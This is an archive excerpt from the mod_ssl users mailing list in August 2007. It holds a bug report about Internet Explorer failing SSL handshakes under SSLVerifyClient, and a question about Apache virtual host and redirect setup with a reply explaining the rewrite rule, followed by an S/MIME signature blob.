> > christa.packer@consolidated.com
> > 217-235-3335
> > 
> 
> 
> 
> Glyn Astill
> 
> 
> 
>       ___________________________________________________________ 
> Want ideas for reducing your carbon footprint? Visit Yahoo! For
> Good  
> http://uk.promotions.yahoo.com/forgood/environment.html
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                  
> www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 
> 



Glyn Astill



      ___________________________________________________________
Yahoo! Answers - Got a question? Someone out there knows the answer. Try it
now.
http://uk.answers.yahoo.com/ 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 17 21:52:43 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8174214D8AA; Fri, 17 Aug 2007 21:52:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.nrlssc.navy.mil (mail2.nrlssc.navy.mil [128.160.25.4])
	by master.modssl.org (Postfix) with ESMTP id E0FBC14D880
	for ; Fri, 17 Aug 2007 21:52:42 +0200 (CEST)
Received: from nms.nrlssc.navy.mil (localhost [127.0.0.1])
	by mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id l7HJqWCw007478
	for ; Fri, 17 Aug 2007 14:52:34 -0500
Received: from [128.160.115.202] (kali.nrlssc.navy.mil [128.160.115.202])
	by nms.nrlssc.navy.mil (8.12.10/8.12.10) with ESMTP id l7HJqVcZ026190
	for ; Fri, 17 Aug 2007 14:52:31 -0500 (CDT)
Message-ID: <46C5FC7F.6090205@nrlssc.navy.mil>
Date: Fri, 17 Aug 2007 14:52:31 -0500
From: Roy Keene 
User-Agent: Thunderbird 2.0.0.6 (X11/20070728)
MIME-Version: 1.0
To: mod_ssl Users 
Subject: Bug in mod_ssl ?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-TM-AS-Product-Ver: : ISVW-6.0.0.2339-3.6.0.1039-15222001
X-TM-AS-Result: : Yes--8.169400-0-31-1
X-TM-AS-Category-Info: : 31:0.000000
X-TM-AS-MatchedID: : =?us-ascii?B?MTUwNjU2LTE0NzAxOC03MDM3?=
	=?us-ascii?B?NDctNzAxNTc2LTcwMzcxMi03MDA4MTAtNzAwODc0LTEyMTM1NS03?=
	=?us-ascii?B?MDEzMDUtNzA3MTE0LTcwMDI5NC03MDExNjItNzAwMTYzLTcwMzQ1?=
	=?us-ascii?B?NC03MDU4NjEtNzAzNzg4LTcwNDAzNC03MDUxMDItNzAxNjQwLTcw?=
	=?us-ascii?B?NTQ4OS03MDk1ODQtNzAxMTQyLTcwMDEwNy03MDIxMzEtNzAxNjA0?=
	=?us-ascii?B?LTcwNzE1MS03MDQ3NTEtNzAwMDc3LTE0ODA1MQ==?=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Roy Keene 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All,

	I recently ran into a problem with mod_ssl and Internet Explorers version 6 and 
7.  I have found that in the case where "SSLVerifyClient" is set to anything 
other than exactly "none" with Apache 1.3.x and mod_ssl 2.8.x that a client 
using Internet Explorer version 6 or 7 cannot connect using HTTPS.  The 
following error is given in the ssl_error_log:
	mod_ssl: SSL handshake interrupted by system connection reset by peer

It is not clear whether this is a mod_ssl or an Internet Explorer bug.  The 
issue is not present when using Apache 2.2.x and the corresponding Apache 
mod_ssl.  I would prefer to continue using Apache 1.3.x and mod_ssl 2.8.x for 
now, but this bug (regardless of which component is faulty) prevents that option 
when "SSLVerifyClient" and availability to clients using Internet Explorer are 
both simultaneously desired.

Is this a known bug ?  Is there a place to report this bug in greater detail ?

Thanks,
-- 
     Roy Keene (Contractor)
     Office of Network Management (Code 7030.8)
     Naval Research Laboratory
     Stennis Space Center, MS 39529
     DSN 828-4827

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Aug 17 21:54:18 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 97AAE14D8AA; Fri, 17 Aug 2007 21:54:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.nrlssc.navy.mil (mail2.nrlssc.navy.mil [128.160.25.4])
	by master.modssl.org (Postfix) with ESMTP id 15A2814D836
	for ; Fri, 17 Aug 2007 21:54:17 +0200 (CEST)
Received: from nms.nrlssc.navy.mil (localhost [127.0.0.1])
	by mail.nrlssc.navy.mil (8.13.7/8.13.7) with ESMTP id l7HJs8ka007507
	for ; Fri, 17 Aug 2007 14:54:10 -0500
Received: from [128.160.115.202] (kali.nrlssc.navy.mil [128.160.115.202])
	by nms.nrlssc.navy.mil (8.12.10/8.12.10) with ESMTP id l7HJs7cZ026249
	for ; Fri, 17 Aug 2007 14:54:07 -0500 (CDT)
Message-ID: <46C5FCDF.6070002@nrlssc.navy.mil>
Date: Fri, 17 Aug 2007 14:54:07 -0500
From: Roy Keene 
User-Agent: Thunderbird 2.0.0.6 (X11/20070728)
MIME-Version: 1.0
To: mod_ssl Users 
Subject: Bug in mod_ssl ?
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
X-TM-AS-Product-Ver: : ISVW-6.0.0.2339-3.6.0.1039-15222001
X-TM-AS-Result: : Yes--8.169400-0-31-1
X-TM-AS-Category-Info: : 31:0.000000
X-TM-AS-MatchedID: : =?us-ascii?B?MTUwNjU2LTE0NzAxOC03MDM3?=
	=?us-ascii?B?NDctNzAxNTc2LTcwMzcxMi03MDA4MTAtNzAwODc0LTEyMTM1NS03?=
	=?us-ascii?B?MDEzMDUtNzA3MTE0LTcwMDI5NC03MDExNjItNzAwMTYzLTcwMzQ1?=
	=?us-ascii?B?NC03MDU4NjEtNzAzNzg4LTcwNDAzNC03MDUxMDItNzAxNjQwLTcw?=
	=?us-ascii?B?NTQ4OS03MDk1ODQtNzAxMTQyLTcwMDEwNy03MDIxMzEtNzAxNjA0?=
	=?us-ascii?B?LTcwNzE1MS03MDQ3NTEtNzAwMDc3LTE0ODA1MQ==?=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Roy Keene 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

All,

	I recently ran into a problem with mod_ssl and Internet Explorers version 6 and 
7.  I have found that in the case where "SSLVerifyClient" is set to anything 
other than exactly "none" with Apache 1.3.x and mod_ssl 2.8.x that a client 
using Internet Explorer version 6 or 7 cannot connect using HTTPS.  The 
following error is given in the ssl_error_log:
	mod_ssl: SSL handshake interrupted by system connection reset by peer

It is not clear whether this is a mod_ssl or an Internet Explorer bug.  The 
issue is not present when using Apache 2.2.x and the corresponding Apache 
mod_ssl.  I would prefer to continue using Apache 1.3.x and mod_ssl 2.8.x for 
now, but this bug (regardless of which component is faulty) prevents that option 
when "SSLVerifyClient" and availability to clients using Internet Explorer are 
both simultaneously desired.

Is this a known bug ?  Is there a place to report this bug in greater detail ?

Thanks,
-- 
     Roy Keene (Contractor)
     Office of Network Management (Code 7030.8)
     Naval Research Laboratory
     Stennis Space Center, MS 39529
     DSN 828-4827

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Aug 18 11:53:46 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7184A14D8AA; Sat, 18 Aug 2007 11:53:46 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp2-g19.free.fr (smtp2-g19.free.fr [212.27.42.28])
	by master.modssl.org (Postfix) with ESMTP id 2C7AF14D856
	for ; Sat, 18 Aug 2007 11:53:45 +0200 (CEST)
Received: from smtp2-g19.free.fr (localhost.localdomain [127.0.0.1])
	by smtp2-g19.free.fr (Postfix) with ESMTP id D3FC699007;
	Sat, 18 Aug 2007 11:53:38 +0200 (CEST)
Received: from frdouvbur03 (lec62-1-82-238-32-33.fbx.proxad.net [82.238.32.33])
	by smtp2-g19.free.fr (Postfix) with ESMTP id 920368DD70;
	Sat, 18 Aug 2007 11:53:38 +0200 (CEST)
Date: Sat, 18 Aug 2007 11:55:04 +0200
To: users@httpd.apache.org
Subject: Some problems with Virtual Host setup and SSL
From: via.lej@free.fr
Content-Type: text/plain; charset=iso-8859-15
MIME-Version: 1.0
Content-Transfer-Encoding: Quoted-Printable
Message-ID: 
User-Agent: Opera Mail/9.23 (Win32)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: via.lej@free.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello !

	I've some problems with Virtual Hosts on Apache2, please have a look at=
 my config files:

=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D
File sites-enabled/default
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D

-------------------------------->
NameVirtualHost *

         ServerAdmin webmaster@localhost

         DocumentRoot /var/www/
         
                 Options FollowSymLinks
                 AllowOverride None
         
         
                 Options Indexes FollowSymLinks MultiViews
                 AllowOverride None
                 Order allow,deny
                 allow from all
         

         ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
         
                 AllowOverride None
                 Options ExecCGI -MultiViews +SymLinksIfOwnerMatch
                 Order allow,deny
                 Allow from all
   

         ErrorLog /var/log/apache2/error.log

         # Possible values include: debug, info, notice, warn, error, cr=
it,
         # alert, emerg.
         LogLevel warn

         CustomLog /var/log/apache2/access.log combined
         ServerSignature On

     Alias /doc/ "/usr/share/doc/"
     
         Options Indexes MultiViews FollowSymLinks
         AllowOverride None
         Order deny,allow
         Deny from all
         Allow from 127.0.0.0/255.0.0.0 ::1/128
     

     DocumentRoot /var/www/phpmyadmin
     ServerSignature On

     
     RewriteEngine on
     RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [L,R]
     



<---------------------------------------



=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D
File sites-enabled/ssl
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D

-------------------------------------->
NameVirtualHost *:443


# change: address of web admin
ServerAdmin webmaster@localhost
SSLEngine On
SSLCertificateFile /etc/ssl/CA/private/Administration-key-cert.pem

ServerSignature On

  
  Options FollowSymLinks
  AllowOverride None
  


ProxyHTMLLogVerbose On
ProxyHTMLExtended On


ProxyRequests Off

Order deny,allow
Allow from all


ProxyPass /ntop/  https://localhost:3000/
ProxyPassReverse /ntop/  https://localhost:3000/

<-------------------------------------------


When i go to http://server/, it redirects to https://server/ and i have =
a 404 error.

I just want to redirect http://admin.server/phpmyadmin (not http://serve=
r/phpmyadmin byt http://admin.server/phpmyadmin) to https://admin.server=
/phpmyadmin

I would also redirect the web pages of a software running on localhost:3=
000 (on the server) to https://admin.server/ntop/

How can i do that ?

Thanks !
Vianney



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 20 20:26:55 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3BD0714D884; Mon, 20 Aug 2007 20:26:55 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bangladesh.disa.mil (bangladesh.disa.mil [198.22.28.100])
	by master.modssl.org (Postfix) with ESMTP id 59E8514D868
	for ; Mon, 20 Aug 2007 20:26:53 +0200 (CEST)
Content-class: urn:content-classes:message
MIME-Version: 1.0
X-MimeOLE: Produced By Microsoft Exchange V6.5
Subject: RE: Some problems with Virtual Host setup and SSL (UNCLASSIFIED)
Date: Mon, 20 Aug 2007 08:26:41 -1000
Content-Type: multipart/signed;
	micalg=SHA1;
	protocol="application/x-pkcs7-signature";
	boundary="----=_NextPart_000_0046_01C7E303.D56D5DF0"
Message-ID: <87FC85CC4AE9C94D9EF34083790C610F5701EE@bangladesh.disanet.disa-u.mil>
In-Reply-To: 
X-MS-Has-Attach: yes
X-MS-TNEF-Correlator: 
Thread-Topic: Some problems with Virtual Host setup and SSL (UNCLASSIFIED)
Thread-Index: AcfhfbVzNvZ6mh0dRouHlyNWDt31gQB2Mp8A
References: 
From: "Victor, Dwight P CTR DISA PAC" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0046_01C7E303.D56D5DF0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Classification:  UNCLASSIFIED 
Caveats: NONE


Hi Vianney,

"When i go to http://server/, it redirects to https://server/ and i have a
404 error."

This is happening because you have this:

     
     RewriteEngine on
     RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [L,R]
     

in your main VirtualHost definition.  If you have SSL enabled, any request
for anything (signified by the ^.*$) would be redirected to the https
server.  Do you have a default page setup?  Check your httpd.conf file to
see what suffixes are set.


"I just want to redirect http://admin.server/phpmyadmin (not
http://server/phpmyadmin byt http://admin.server/phpmyadmin) to
https://admin.server/phpmyadmin"

Does your server have a DNS record for "admin" or do you have something in
your /etc/hosts file that points to "admin?"  This syntax "admin.domain"
usually means that you want to get to the "admin" machine on the "domain"
domain.  To set this up, you have to have something that tells Apache which
machine will answer to the name "admin."  Then you'll want to edit your
rewrite rule to just redirect calls to "admin.domain."

"I would also redirect the web pages of a software running on localhost:3000
(on the server) to https://admin.server/ntop/"

Read up on the use of the mod_rewrite module:

For Apache 1.3 => http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
For Apache 2 => http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html

Hope that helps,

Dwight...

---
Dwight Victor, CISSP (Contractor)
DISA-PAC EMSS Gateway Hawaii
EMAIL: dwight.victor.ctr@disa.mil
TEL:   (808) 653-3677 ext 229
Classification:  UNCLASSIFIED 
Caveats: NONE


------=_NextPart_000_0046_01C7E303.D56D5DF0
Content-Type: application/x-pkcs7-signature;
	name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="smime.p7s"

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIS4jCCAmcw
ggHQoAMCAQICAQQwDQYJKoZIhvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4g
R292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0RvRCBDTEFT
UyAzIFJvb3QgQ0EwHhcNMDAwNTE5MTMxMzAwWhcNMjAwNTE0MTMxMzAwWjBhMQswCQYDVQQGEwJV
UzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEc
MBoGA1UEAxMTRG9EIENMQVNTIDMgUm9vdCBDQTCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA
tTD+ZL7qzG3tgSz3f+kZug5paijhqanLlVgf8eaaaVPgiD+RxVG5Y5eo5iGME142PKhX+vhwLExq
y78wp0wW5DJc+BKwUfgWV40vtE36LqiU6Cph1FcNR85uLC9+mGfMAAirtpYWNcKFkeVboArHZlJi
82F1lReuvCpWKaXgK1MCAwEAAaMvMC0wHQYDVR0OBBYEFGycpfBcj21BjcQXO5BXwg+jzW3+MAwG
A1UdEwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADgYEAr3FE+ZcjzGhpjEMHQbqIILMiAEHImKBVHM0/
brGTXK36GJq7HHNv/SRCj4efUc++hp/p14pITwjZaZSsP+YPLZcPKJN2T2Lf/6DNYfimhgwxNCDc
fy+o+zm+le44WQJiwd5sFU/g35275HlzJP1jZJX3SqiZH0hllcd7v3gy53owggP0MIIDXaADAgEC
AgMZ8dMwDQYJKoZIhvcNAQEFBQAwXzELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJu
bWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxGjAYBgNVBAMTEURPRCBDTEFTUyAzIENB
LTEwMB4XDTA1MTAxMTAwMDAwMFoXDTA4MTAwMzIzNTk1OVowgYIxCzAJBgNVBAYTAlVTMRgwFgYD
VQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoGA1UECxMDUEtJMRMwEQYDVQQL
EwpDT05UUkFDVE9SMSgwJgYDVQQDEx9WSUNUT1IuRFdJR0hULlBISUxJUC4xMjY4NzczMTA2MIGf
MA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCGtatc27IN+5VIX07ErsMMt88n7NsRUQj6dItWA6c4
RFU+rcLdfByywAr4DWTMFFMYkL0CGmmdOTaZA8W4jWt3X++7elikr4LWmmoUv0/WqY7Bye3w0Dwc
y0WwLKi5Uy8PCqdfN2/kaPpLFWln27ACPi/V5Zdlt2kX4YQHNSrp2QIDAQABo4IBmDCCAZQwDgYD
VR0PAQH/BAQDAgbAMB8GA1UdIwQYMBaAFDUnGjCMHk2mYHu3LTpGLkupLyswMB0GA1UdDgQWBBR4
N9gb8hTWkNf4y/Zs9AZ2rwAKLjAWBgNVHSAEDzANMAsGCWCGSAFlAgELCTB9BgNVHRIEdjB0hnJs
ZGFwOi8vZHMtNC5jM3BraS5kZW4uZGlzYS5taWwvY24lM2RET0QlMjBDTEFTUyUyMDMlMjBDQS0x
MCUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMw
gaoGA1UdHwSBojCBnzCBnKCBmaCBloaBk2xkYXA6Ly9kcy00LmMzcGtpLmRlbi5kaXNhLm1pbC9j
biUzZERPRCUyMENMQVNTJTIwMyUyMENBLTEwJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28lM2RV
LlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2JpbmFy
eTANBgkqhkiG9w0BAQUFAAOBgQARGOMmXEyNRvTInT4IdnavBhh7siT2sCMtI/TlRuqO93rj5/ji
yS0xPTMwElZFjqU2vnIECjHs3fb0/thZ82URriwaK7LWNnLl+ZH5fqRFHDM078Li3iMxTUKb9dnS
YlcFuyQ+A+YOTG+Dp3rRP6xqDGN3C2iqMwteIvHr/vjtfDCCBBYwggN/oAMCAQICAScwDQYJKoZI
hvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEMMAoGA1UE
CxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0RvRCBDTEFTUyAzIFJvb3QgQ0EwHhcNMDMw
NjEwMDk1MjQxWhcNMDkwNjA4MDk1MjQxWjBfMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBH
b3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsTA1BLSTEaMBgGA1UEAxMRRE9EIENMQVNT
IDMgQ0EtMTAwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAIl3jnkfyFSwDCl+lkhsALfMk7iX
sxSPtUc0tdqvf3lglnpXHWV/3kSMTNwWXHJ09SK+Zw0+k29h0sVkWR02CmTjau1sZRhh2+m5naAA
yHdgIOebAYHff5BJnzdXSnhlJ+kjaQchGe6gTVKVUr1yG5ocHAUOnghgFkPZ8RW5PWlTAgMBAAGj
ggHeMIIB2jAdBgNVHQ4EFgQUNScaMIweTaZge7ctOkYuS6kvKzAwDgYDVR0PAQH/BAQDAgGGMA8G
A1UdEwEB/wQFMAMBAf8wDAYDVR0kBAUwA4ABADAfBgNVHSMEGDAWgBRsnKXwXI9tQY3EFzuQV8IP
o81t/jAwBgNVHSAEKTAnMAsGCWCGSAFlAgELBTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIGD
BgNVHRIEfDB6hnhsZGFwOi8vZHMtMy5jM3BraS5jaGFtYi5kaXNhLm1pbC9jbiUzZERvRCUyMENM
QVNTJTIwMyUyMFJvb3QlMjBDQSUyY291JTNkUEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdv
dmVybm1lbnQlMmNjJTNkVVMwgbAGA1UdHwSBqDCBpTCBoqCBn6CBnIaBmWxkYXA6Ly9kcy0zLmMz
cGtpLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9EJTIwQ0xBU1MlMjAzJTIwUm9vdCUyMENBJTJjb3Ul
M2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZp
Y2F0ZXJldm9jYXRpb25saXN0O2JpbmFyeTANBgkqhkiG9w0BAQUFAAOBgQCmm1CSI3PtF0ENNidT
1nOG6KTVqh3340GqVusqwmwA/gUU0Ny7gmf4aMq02NiX5E7h/CTrSaLI1EcKwoDdwoPLOWd0huSU
LhrKGxHTsM3AxR8OcdOGO8dVbbNJv2iP0iNb7VaXvJ3XSQEbl3sPVP6Gy8Rl9TmFFrho7P0V+7Ot
aTCCBBwwggOFoAMCAQICASgwDQYJKoZIhvcNAQEFBQAwYTELMAkGA1UEBhMCVVMxGDAWBgNVBAoT
D1UuUy4gR292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxHDAaBgNVBAMTE0Rv
RCBDTEFTUyAzIFJvb3QgQ0EwHhcNMDMwNjEwMDk1NTAxWhcNMDkwNjA4MDk1NTAxWjBlMQswCQYD
VQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQLEwNEb0QxDDAKBgNVBAsT
A1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0EtMTAwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBANQhe2pVqqwwtYkLXpPlJBxR3fip5SMYdRFf25JmURt8Zb1+KhM6CCOWxBmPJg3E
R/L5rPtSRFuuco6M+lSHDfKnRKepJFBUfSieHPeBCtvh35PSvjDKXEQMf5G+fmMcYL/HbHbDPrKx
UHx5SprkxqQKolLXpLcvbqlDu8565vBpAgMBAAGjggHeMIIB2jAdBgNVHQ4EFgQUbzcjpNMg6/QM
P2CfeUwLchDSPJcwDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wDAYDVR0kBAUwA4AB
ADAfBgNVHSMEGDAWgBRsnKXwXI9tQY3EFzuQV8IPo81t/jAwBgNVHSAEKTAnMAsGCWCGSAFlAgEL
BTALBglghkgBZQIBCwkwCwYJYIZIAWUCAQsKMIGDBgNVHRIEfDB6hnhsZGFwOi8vZHMtMy5jM3Br
aS5jaGFtYi5kaXNhLm1pbC9jbiUzZERvRCUyMENMQVNTJTIwMyUyMFJvb3QlMjBDQSUyY291JTNk
UEtJJTJjb3UlM2REb0QlMmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVMwgbAGA1UdHwSB
qDCBpTCBoqCBn6CBnIaBmWxkYXA6Ly9kcy0zLmMzcGtpLmNoYW1iLmRpc2EubWlsL2NuJTNkRG9E
JTIwQ0xBU1MlMjAzJTIwUm9vdCUyMENBJTJjb3UlM2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMu
JTIwR292ZXJubWVudCUyY2MlM2RVUz9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0O2JpbmFyeTAN
BgkqhkiG9w0BAQUFAAOBgQCnZVmnmbJyuKSZpTUKwp7gCLe3akj225PQOrhHx0gt64LH2fvDEwhC
riHO8jRGIyDdRCQiDpPe9u2Y/xK/wvIUWDUBPML/m+OwGODiuTF81N8egB7OtG+iq2sa2oU+97oi
1rYIFj4djZnvWz49FG9q5FTodfD1Yphd3hfJ6Y+DCTCCBEEwggOqoAMCAQICAx/mxDANBgkqhkiG
9w0BAQUFADBlMQswCQYDVQQGEwJVUzEYMBYGA1UEChMPVS5TLiBHb3Zlcm5tZW50MQwwCgYDVQQL
EwNEb0QxDDAKBgNVBAsTA1BLSTEgMB4GA1UEAxMXRE9EIENMQVNTIDMgRU1BSUwgQ0EtMTAwHhcN
MDUxMDExMDAwMDAwWhcNMDgxMDAzMjM1OTU5WjCBgjELMAkGA1UEBhMCVVMxGDAWBgNVBAoTD1Uu
Uy4gR292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kxEzARBgNVBAsTCkNPTlRS
QUNUT1IxKDAmBgNVBAMTH1ZJQ1RPUi5EV0lHSFQuUEhJTElQLjEyNjg3NzMxMDYwgZ8wDQYJKoZI
hvcNAQEBBQADgY0AMIGJAoGBAK+HFyjqsB3OI0A8uLG3w9mg0cgzxa94OPJGtVK9SoFxMlwnSHcx
mobboTnCNHKOXmkN6MT8bPp8Omeppf0zHTzSzcacwv/EkPz4Zk20IDwceo2RevXy01u7U3777ZtW
1EzLrjAL6mY6oD2KXZG45OpJDjg4oNGbpo2k2WPTIP3bAgMBAAGjggHfMIIB2zAOBgNVHQ8BAf8E
BAMCBSAwJQYDVR0RBB4wHIEaZHdpZ2h0LnZpY3Rvci5jdHJAZGlzYS5taWwwHwYDVR0jBBgwFoAU
bzcjpNMg6/QMP2CfeUwLchDSPJcwHQYDVR0OBBYEFJGhNIbyEnLXIMahd22+LZAQg6FOMBYGA1Ud
IAQPMA0wCwYJYIZIAWUCAQsJMIGOBgNVHRIEgYYwgYOGgYBsZGFwOi8vZW1haWwtZHMtNC5jM3Br
aS5kZW4uZGlzYS5taWwvY24lM2RET0QlMjBDTEFTUyUyMDMlMjBFTUFJTCUyMENBLTEwJTJjb3Ul
M2RQS0klMmNvdSUzZERvRCUyY28lM2RVLlMuJTIwR292ZXJubWVudCUyY2MlM2RVUzCBuAYDVR0f
BIGwMIGtMIGqoIGnoIGkhoGhbGRhcDovL2VtYWlsLWRzLTQuYzNwa2kuZGVuLmRpc2EubWlsL2Nu
JTNkRE9EJTIwQ0xBU1MlMjAzJTIwRU1BSUwlMjBDQS0xMCUyY291JTNkUEtJJTJjb3UlM2REb0Ql
MmNvJTNkVS5TLiUyMEdvdmVybm1lbnQlMmNjJTNkVVM/Y2VydGlmaWNhdGVyZXZvY2F0aW9ubGlz
dDtiaW5hcnkwDQYJKoZIhvcNAQEFBQADgYEARRvrfgpwfPSmQh57wvP0UdjhVXud5CkqhR9jechp
Suv6zI81K5RazYSm3BZSGdKr7gbcpyYobSDRgYdI16VUqCnEHuuAB8+BqGmAvQ/5cj+XNnjdko41
ZCWsPVPDZ1h1FDH9xiVOSX5fbLJFIobWiLbcxdGtofPOGxSpA/oKNF0xggLSMIICzgIBATBmMF8x
CzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEMMAoG
A1UECxMDUEtJMRowGAYDVQQDExFET0QgQ0xBU1MgMyBDQS0xMAIDGfHTMAkGBSsOAwIaBQCgggHC
MBgGCSqGSIb3DQEJAzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTA3MDgyMDE4MjY0MFow
IwYJKoZIhvcNAQkEMRYEFIzUJFGELQSklTBAzIdhtWoheCFkMGcGCSqGSIb3DQEJDzFaMFgwCgYI
KoZIhvcNAwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3
DQMCAgEoMAcGBSsOAwIaMAoGCCqGSIb3DQIFMHsGCSsGAQQBgjcQBDFuMGwwZTELMAkGA1UEBhMC
VVMxGDAWBgNVBAoTD1UuUy4gR292ZXJubWVudDEMMAoGA1UECxMDRG9EMQwwCgYDVQQLEwNQS0kx
IDAeBgNVBAMTF0RPRCBDTEFTUyAzIEVNQUlMIENBLTEwAgMf5sQwfQYLKoZIhvcNAQkQAgsxbqBs
MGUxCzAJBgNVBAYTAlVTMRgwFgYDVQQKEw9VLlMuIEdvdmVybm1lbnQxDDAKBgNVBAsTA0RvRDEM
MAoGA1UECxMDUEtJMSAwHgYDVQQDExdET0QgQ0xBU1MgMyBFTUFJTCBDQS0xMAIDH+bEMA0GCSqG
